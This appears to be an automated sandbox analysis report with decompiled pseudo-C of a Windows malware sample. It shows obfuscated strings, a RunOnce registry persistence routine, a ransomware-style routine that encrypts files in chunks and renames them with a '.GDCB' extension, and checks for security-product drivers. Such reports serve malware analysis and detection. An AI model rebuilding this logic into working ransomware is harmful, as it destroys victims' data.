Part of subcall function 00D73AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00D73B56
Part of subcall function 00D73AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00D73B5A
Part of subcall function 00D73AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00D73B5E
Part of subcall function 00D73AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00D73B85

Part of subcall function 00D73A60: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D73A90

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D73C4D
wsprintfW.USER32 ref: 00D73D17
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 00D73D2B
GetForegroundWindow.USER32 ref: 00D73D40
ShellExecuteExW.SHELL32(00000000), ref: 00D73DA1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D73DB4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D73DC6
CloseHandle.KERNEL32(?), ref: 00D73DCF
ExitProcess.KERNEL32 ref: 00D73DD7

Strings

d, xrefs: 00D73BED
c, xrefs: 00D73CD5
w, xrefs: 00D73C25
e, xrefs: 00D73CA9
\, xrefs: 00D73BFD
s, xrefs: 00D73CE0
, xrefs: 00D73C91
2, xrefs: 00D73C1D
\, xrefs: 00D73C35
%, xrefs: 00D73D01
%, xrefs: 00D73BD7
t, xrefs: 00D73CF6
a, xrefs: 00D73CEB
a, xrefs: 00D73CA1
p, xrefs: 00D73C58
i, xrefs: 00D73BE4
r, xrefs: 00D73BF5
", xrefs: 00D73CB4
y, xrefs: 00D73C05
", xrefs: 00D73D0C
s, xrefs: 00D73D65
o, xrefs: 00D73C68
c, xrefs: 00D73C45
r, xrefs: 00D73D55
m, xrefs: 00D73CBF
t, xrefs: 00D73C0D
r, xrefs: 00D73C99
m, xrefs: 00D73C15
e, xrefs: 00D73C71
c, xrefs: 00D73C81
l, xrefs: 00D73C89
e, xrefs: 00D73C2D
s, xrefs: 00D73C79
, xrefs: 00D73CCA
n, xrefs: 00D73D5D

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: e5654c9df2785de4e4bb5b6a1018fa1020f60ea8dac62ea173f49a27ec295f67
Instruction ID: bda52ffed6f889af5fb78bf2bb175ce5fd14b1ece92786280280d1b5a72a8065
Opcode Fuzzy Hash: e5654c9df2785de4e4bb5b6a1018fa1020f60ea8dac62ea173f49a27ec295f67
Instruction Fuzzy Hash: 08513AB1408341DFE3208F11D858B9AFBF9FF84748F00491DE59886251D7B69558CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00D72960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00D72960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E00D77C60( &_v32, lstrlenW( &_v32));
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0) != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47);
					asm("sbb esi, esi");
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x00d7296b
0x00d7296d
0x00d72979
0x00d72980
0x00d72984
0x00d7298c
0x00d72993
0x00d7299a
0x00d729a8
0x00d729b0
0x00d729bd
0x00d729c7
0x00d729ce
0x00d729eb
0x00d729f8
0x00d729ff
0x00d72a06
0x00d72a0d
0x00d72a14
0x00d72a1b
0x00d72a22
0x00d72a29
0x00d72a30
0x00d72a37
0x00d72a3e
0x00d72a45
0x00d72a4c
0x00d72a53
0x00d72a5a
0x00d72a61
0x00d72a68
0x00d72a6f
0x00d72a76
0x00d72a7d
0x00d72a8c
0x00d72ac7
0x00d72a8e
0x00d72aa4
0x00d72aaf
0x00d72ab1
0x00d72ab7
0x00d72abf
0x00d72abf

APIs

lstrlenW.KERNEL32(00520050,00000041,746982B0,00000000), ref: 00D7299D

Part of subcall function 00D77C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00D77C7D
Part of subcall function 00D77C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00D77CAB
Part of subcall function 00D77C60: GetModuleHandleA.KERNEL32(?), ref: 00D77CFF
Part of subcall function 00D77C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00D77D0D
Part of subcall function 00D77C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00D77D1C
Part of subcall function 00D77C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D77D65
Part of subcall function 00D77C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D77D73

RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,00D72C45,00000000), ref: 00D72A84
lstrlenW.KERNEL32(00000000), ref: 00D72A8F
RegSetValueExW.ADVAPI32(00D72C45,00520050,00000000,00000001,00000000,00000000), ref: 00D72AA4
RegCloseKey.ADVAPI32(00D72C45), ref: 00D72AB1

Strings

S, xrefs: 00D729B0
i, xrefs: 00D729F8
R, xrefs: 00D729CE
I, xrefs: 00D72979
w, xrefs: 00D72A29
r, xrefs: 00D729FF
H, xrefs: 00D72993
F, xrefs: 00D729BD
i, xrefs: 00D72A5A
n, xrefs: 00D72A45
r, xrefs: 00D72A3E
R, xrefs: 00D72A68
\, xrefs: 00D72A14
V, xrefs: 00D72A4C
\, xrefs: 00D72A30
u, xrefs: 00D72A37
n, xrefs: 00D72A76
U, xrefs: 00D72984
n, xrefs: 00D72A6F
e, xrefs: 00D72A7D
i, xrefs: 00D72A1B
f, xrefs: 00D72A0D
s, xrefs: 00D72A06
\, xrefs: 00D729EB
r, xrefs: 00D72A53
d, xrefs: 00D72A22
A, xrefs: 00D7298C
P, xrefs: 00D7296D
n, xrefs: 00D72A61
W, xrefs: 00D729C7

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 41bf932daadc089950bdd1da04ee77cba4e51f35b5434ab30d1c15231e0b345e
Instruction ID: 0ce68cd0594786e06a27a515a21a01859ce215be603a05f48ef53e90d2722f40
Opcode Fuzzy Hash: 41bf932daadc089950bdd1da04ee77cba4e51f35b5434ab30d1c15231e0b345e
Instruction Fuzzy Hash: 6931ECB190031CDFEB20CF91E859BEDBFB5FB05709F508119D518AA291D7BA4988CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D735E0 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 300
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00D735E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				void* _v28;
				WCHAR* _v32;
				void* _v36;
				long _v40;
				void* _v44;
				void* _v48;
				WCHAR* _v52;
				void* _v56;
				void* _v60;
				signed int _v64;
				void _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				long _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t100;
				void* _t106;
				long _t121;
				long _t122;
				long _t125;
				WCHAR* _t139;
				void* _t142;
				void* _t145;
				void* _t147;
				WCHAR* _t158;
				WCHAR* _t160;
				void* _t161;
				void* _t162;
				void _t164;
				long _t165;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t139 = __ecx;
				_t162 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t139, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v40 = 0;
				_t147 = _t162;
				E00D75EA0(_t147, 0, 0,  &_v20,  &_v40);
				_t158 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v32 = _t158;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t158, _t139);
				lstrcatW(_t158,  &_v80);
				asm("movdqa xmm0, [0xd80950]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t147);
				asm("movdqa xmm0, [0xd80950]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xd80950]");
				asm("movdqu [ebp-0x64], xmm0");
				E00D77DB0( &_v104, 0x10);
				E00D77DB0( &_v140, 0x20);
				_t92 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				_t140 = _t92;
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v44 = _t92;
				asm("movdqu [ebx+0x10], xmm0");
				_t93 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t159 = _t93;
				_v48 = _t93;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t95 = E00D76000(_v20, _v40, _t140,  &_v88, 0x800);
				_t169 = _t167 + 0x18;
				if(_t95 == 0) {
					L22:
					_t160 = _v32;
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x40], xmm0");
					_t164 = _v68;
					_v8 = _v64;
					L23:
					VirtualFree(_t160, 0, 0x8000);
					return _t164;
				}
				_t100 = E00D76000(_v20, _v40, _t159,  &_v84, 0x800);
				_t170 = _t169 + 0x14;
				if(_t100 != 0) {
					E00D77EE0( &_v140,  &_v388);
					_t171 = _t170 + 8;
					_t142 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
					_v36 = _t142;
					if(_t142 == 0xffffffff) {
						goto L22;
					}
					_t161 = VirtualAlloc(0, 8, 0x3000, 4);
					 *_t161 = 0;
					 *(_t161 + 4) = 0;
					_t106 = VirtualAlloc(0, 0x100001, 0x3000, 4);
					_t165 = 0;
					_v28 = _t106;
					_v24 = 0;
					while(ReadFile(_t142, _t106, 0x100000,  &_v12, 0) != 0) {
						_t121 = _v12;
						if(_t121 == 0) {
							break;
						}
						_t145 = 0;
						_v60 = 0;
						_t165 =  <  ? 1 : _t165;
						 *_t161 =  *_t161 + _t121;
						asm("adc [edi+0x4], ebx");
						_t122 = _v12;
						_v8 = _t122;
						if((_t122 & 0x0000000f) == 0) {
							L12:
							_v56 = VirtualAlloc(0, _t122, 0x3000, 4);
							E00D784E0(_t123, _v28, _v8);
							_t125 = _v12;
							_t171 = _t171 + 0xc;
							_v64 = _t125;
							if(VirtualAlloc(0, _t125, 0x3000, 4) != 0) {
								E00D73500(_v56, _v64,  &_v60,  &_v388,  &_v104, _t126);
								_t145 = _v60;
								_t171 = _t171 + 0x10;
							}
							VirtualFree(_v56, 0, 0x8000);
							SetFilePointer(_v36,  ~_v8, 0, 1);
							if(WriteFile(_v36, _t145, _v12,  &_v16, 0) == 0) {
								_t165 = 1;
								_v24 = 1;
							}
							VirtualFree(_t145, 0, 0x8000);
							_t142 = _v36;
							if(_t165 == 0) {
								_t106 = _v28;
								continue;
							} else {
								break;
							}
						}
						do {
							_t122 = _t122 + 1;
						} while ((_t122 & 0x0000000f) != 0);
						_v12 = _t122;
						goto L12;
					}
					VirtualFree(_v28, 0, 0x8000);
					if(_v24 == 0) {
						WriteFile(_t142, _v44, 0x100,  &_v16, 0);
						WriteFile(_t142, _v48, 0x100,  &_v16, 0);
						WriteFile(_t142, _t161, 0x10,  &_v16, 0);
					}
					CloseHandle(_t142);
					_t164 =  *_t161;
					_v8 =  *(_t161 + 4);
					VirtualFree(_t161, 0, 0x8000);
					VirtualFree(_v44, 0, 0x8000);
					VirtualFree(_v48, 0, 0x8000);
					_t160 = _v32;
					if(_v24 == 0) {
						MoveFileW(_v52, _t160);
					}
					goto L23;
				}
				GetLastError();
				goto L22;
			}

0x00d735eb
0x00d735ed
0x00d735f1
0x00d735ff
0x00d73608
0x00d73613
0x00d7361f
0x00d73621
0x00d7363c
0x00d7363e
0x00d73647
0x00d7364a
0x00d73651
0x00d73658
0x00d73663
0x00d73669
0x00d73676
0x00d7367e
0x00d7367f
0x00d7368a
0x00d7368f
0x00d73693
0x00d7369b
0x00d736a0
0x00d736b0
0x00d736c6
0x00d736c8
0x00d736d0
0x00d736de
0x00d736e4
0x00d736e9
0x00d736ec
0x00d736f1
0x00d736f3
0x00d736f8
0x00d73703
0x00d73706
0x00d7370a
0x00d73711
0x00d7371f
0x00d7372a
0x00d7372f
0x00d7397c
0x00d7397c
0x00d7397f
0x00d73982
0x00d7398a
0x00d7398d
0x00d73990
0x00d73998
0x00d739a5
0x00d739a5
0x00d73745
0x00d7374a
0x00d7374f
0x00d7376a
0x00d7376f
0x00d7378d
0x00d7378f
0x00d73795
0x00000000
0x00d73976
0x00d737aa
0x00d737b8
0x00d737be
0x00d737c5
0x00d737c7
0x00d737c9
0x00d737cc
0x00d737d4
0x00d737ef
0x00d737f4
0x00000000
0x00000000
0x00d737fa
0x00d73806
0x00d73809
0x00d7380c
0x00d7380e
0x00d73811
0x00d73814
0x00d73819
0x00d73828
0x00d7383b
0x00d73842
0x00d73847
0x00d7384a
0x00d7384d
0x00d73862
0x00d7387a
0x00d7387f
0x00d73882
0x00d73882
0x00d7388f
0x00d738a2
0x00d738bd
0x00d738bf
0x00d738c4
0x00d738c4
0x00d738cf
0x00d738d5
0x00d738da
0x00d737d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00d738da
0x00d73820
0x00d73820
0x00d73821
0x00d73825
0x00000000
0x00d73825
0x00d738ea
0x00d738f4
0x00d7390b
0x00d7391c
0x00d73928
0x00d73928
0x00d7392b
0x00d73934
0x00d73944
0x00d73947
0x00d73953
0x00d7395f
0x00d73965
0x00d73968
0x00d7396e
0x00d7396e
0x00000000
0x00d73968
0x00d73751
0x00000000

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 00D735F4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00D735FF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 00D7363A
lstrcpyW.KERNEL32 ref: 00D73658
lstrcatW.KERNEL32(00000000,0047002E), ref: 00D73663

Part of subcall function 00D77DB0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,746566A0,00000000), ref: 00D77DD0
Part of subcall function 00D77DB0: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00D77DF8
Part of subcall function 00D77DB0: GetModuleHandleA.KERNEL32(?), ref: 00D77E4D
Part of subcall function 00D77DB0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00D77E5B
Part of subcall function 00D77DB0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00D77E6A
Part of subcall function 00D77DB0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D77E8E
Part of subcall function 00D77DB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D77E9C

Part of subcall function 00D77DB0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00D736A5), ref: 00D77EB0
Part of subcall function 00D77DB0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,00D736A5), ref: 00D77EBE

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 00D736C6
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 00D736F1

Part of subcall function 00D76000: EnterCriticalSection.KERNEL32(00D82AE8,?,00D73724,00000000,00000000,00000000,?,00000800), ref: 00D7600B
Part of subcall function 00D76000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00D73724,00000000,00000000,00000000), ref: 00D7602E
Part of subcall function 00D76000: GetLastError.KERNEL32(?,00D73724,00000000,00000000,00000000), ref: 00D76038
Part of subcall function 00D76000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00D73724,00000000,00000000,00000000), ref: 00D76054

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D73998

Part of subcall function 00D76000: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00D73724,00000000,00000000), ref: 00D76089
Part of subcall function 00D76000: CryptGetKeyParam.ADVAPI32(00000000,00000008,00D73724,0000000A,00000000,?,00D73724,00000000), ref: 00D760AA
Part of subcall function 00D76000: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,00D73724,?,00D73724,00000000), ref: 00D760D2
Part of subcall function 00D76000: GetLastError.KERNEL32(?,00D73724,00000000), ref: 00D760DB
Part of subcall function 00D76000: CryptReleaseContext.ADVAPI32(00000000,00000000,?,00D73724,00000000,00000000), ref: 00D760F8
Part of subcall function 00D76000: LeaveCriticalSection.KERNEL32(00D82AE8,?,00D73724,00000000,00000000), ref: 00D76103

GetLastError.KERNEL32 ref: 00D73751
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00D73787
VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000004), ref: 00D737A6
VirtualAlloc.KERNEL32(00000000,00100001,00003000,00000004), ref: 00D737C5
ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 00D737E1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00D73832
_memmove.LIBCMT ref: 00D73842
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00D7385A
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D7388F

Strings

B, xrefs: 00D73651
D, xrefs: 00D7364A
., xrefs: 00D7363E
, xrefs: 00D7370A

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtual$Crypt$Alloc$Context$FileFree$AcquireErrorLastRelease$AttributesCriticalSection$AddressCreateEncryptEnterHandleImportLeaveLibraryLoadModuleParamProcRead_memmovelstrcatlstrcpy
String ID: $.$B$D
API String ID: 837238375-1812608335
Opcode ID: c813ccf19f8b6529d5b979f19db3684e5c869afd1b62ee31c84b1ec0a499e297
Instruction ID: 019f33dccf9392902921710d03cc5c309cb8b4ac8a2164bd01f49ec1c1f462ad
Opcode Fuzzy Hash: c813ccf19f8b6529d5b979f19db3684e5c869afd1b62ee31c84b1ec0a499e297
Instruction Fuzzy Hash: 5AB13071E40309ABEB119B94DC46FEEBB78FF48700F204115FA48B62D1EBB55A54CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00D72D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00D72D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				short _t42;
				void* _t49;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				if(E00D72F50( &(_v84.message)) != 0 || E00D72F50( &_v96) != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E00D72C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E00D72D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
							}
							goto L15;
						}
						ExitThread(_t71);
					}
					ExitThread();
				} else {
					_v84.message = 0x730066;
					_v84.wParam = 0x660064;
					_v84.lParam = 0x2e0077;
					_v84.time = 0x790073;
					_v84.pt = 0x73;
					if(E00D72F50( &(_v84.message)) != 0) {
						L15:
						ExitThread(0);
					}
					_t61 = E00D730A0(_t62, _t67, _t69);
					if(_t61 != 0) {
						goto L15;
					}
					_push(_t61);
					E00D72AD0();
					goto L5;
				}
			}

0x00d72d39
0x00d72d3a
0x00d72d3d
0x00d72d45
0x00d72d4a
0x00d72d52
0x00d72d5a
0x00d72d62
0x00d72d67
0x00d72d6f
0x00d72d77
0x00d72d7f
0x00d72d8e
0x00d72de9
0x00d72df1
0x00d72df9
0x00d72e01
0x00d72e09
0x00d72e11
0x00d72e22
0x00d72e26
0x00d72e3d
0x00d72e41
0x00d72e49
0x00d72e51
0x00d72e5f
0x00d72e68
0x00d72e6e
0x00d72e73
0x00d72e7b
0x00d72eaf
0x00d72eb4
0x00d72ebc
0x00d72ec8
0x00d72ecf
0x00d72ee3
0x00d72eeb
0x00d72eee
0x00d72eee
0x00d72f09
0x00d72f17
0x00d72f1c
0x00d72f25
0x00d72f17
0x00000000
0x00d72f09
0x00d72ebf
0x00d72ebf
0x00d72e75
0x00d72d9d
0x00d72da1
0x00d72da9
0x00d72db1
0x00d72db9
0x00d72dc1
0x00d72dd0
0x00d72f3d
0x00d72f3f
0x00d72f3f
0x00d72dd6
0x00d72ddd
0x00000000
0x00000000
0x00d72de3
0x00d72de4
0x00000000
0x00d72de4

APIs

Part of subcall function 00D72F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00D72F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00D72E19
LoadCursorW.USER32(00000000,00007F00), ref: 00D72E2E
LoadIconW.USER32 ref: 00D72E59
RegisterClassExW.USER32 ref: 00D72E68
ExitThread.KERNEL32 ref: 00D72E75

Part of subcall function 00D72F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00D72F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00D72E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 00D72E81
CreateWindowExW.USER32 ref: 00D72EA7
SetWindowLongW.USER32 ref: 00D72EB4
ExitThread.KERNEL32 ref: 00D72EBF

Part of subcall function 00D72F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 00D72FA8
Part of subcall function 00D72F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 00D72FCF
Part of subcall function 00D72F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 00D72FE3
Part of subcall function 00D72F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D72FFA

ExitThread.KERNEL32 ref: 00D72F3F

Part of subcall function 00D72AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00D72AEA
Part of subcall function 00D72AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00D72B2C
Part of subcall function 00D72AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 00D72B38
Part of subcall function 00D72AD0: ExitThread.KERNEL32 ref: 00D72C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 00D72EC8
UpdateWindow.USER32(00000000), ref: 00D72ECF
CreateThread.KERNEL32 ref: 00D72EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00D72EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D72F05
TranslateMessage.USER32(?), ref: 00D72F1C
DispatchMessageW.USER32 ref: 00D72F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D72F37

Strings

win32app, xrefs: 00D72E51, 00D72EA0
f, xrefs: 00D72DA1
s, xrefs: 00D72D77
s, xrefs: 00D72D7F
firefox, xrefs: 00D72E9B
w, xrefs: 00D72DB1
s, xrefs: 00D72DB9
k, xrefs: 00D72D67
d, xrefs: 00D72DA9
s, xrefs: 00D72DC1
1, xrefs: 00D72D6F
0, xrefs: 00D72DF1

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

